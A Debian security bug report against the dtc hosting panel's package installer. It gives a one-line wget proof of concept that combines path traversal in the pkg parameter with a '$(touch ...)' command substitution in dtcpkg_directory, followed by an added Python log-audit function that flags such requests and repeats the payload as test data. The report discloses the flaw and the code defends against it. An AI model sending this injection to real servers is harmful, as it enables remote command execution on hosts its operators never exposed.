Package: src:dtc
Version: 0.32.10-2
Severity: critical
Tags: security upstream

The package installer helpfully allows users to run shell code:

  wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'

Ansgar
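Added example, not part of the original report and not dtc's own code: a log-review check that flags do_install requests whose pkg or dtcpkg_directory values look like the ones in the request above. The function name audit_install_request, the allowlist of characters for a directory name, and the benign sample request are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate package directory only needs these characters.
# Anything else ($, parentheses, backticks, spaces, ;, | ...) is reported.
SAFE_DIR = re.compile(r"[A-Za-z0-9._/-]+")


def audit_install_request(url):
    """Return a list of (parameter, reason) findings for one request URL."""
    # parse_qs percent-decodes values, so encoded forms are checked too.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "do_install" not in params.get("action", []):
        return []
    findings = []
    for pkg in params.get("pkg", []):
        segments = pkg.replace("\\", "/").split("/")
        if pkg.startswith("/") or ".." in segments:
            findings.append(("pkg", "path traversal"))
    for directory in params.get("dtcpkg_directory", []):
        if not SAFE_DIR.fullmatch(directory):
            findings.append(("dtcpkg_directory", "character outside allowlist"))
    return findings


# Sample input: the request from the report, then a constructed benign
# request (its parameter values are made up for this example).
REPORTED = (
    "http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install"
    "&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer"
    "&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www"
)
BENIGN = (
    "http://localhost:8080/dtc/?action=do_install&pkg=examplepkg"
    "&dtcpkg_directory=examplepkg-1.0&subdomain=www"
)

if __name__ == "__main__":
    for url in (REPORTED, BENIGN):
        print(audit_install_request(url) or "clean")
```

The same allowlist and path-segment checks apply server-side before the values reach a file path or a shell command; there, the request is rejected rather than logged.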

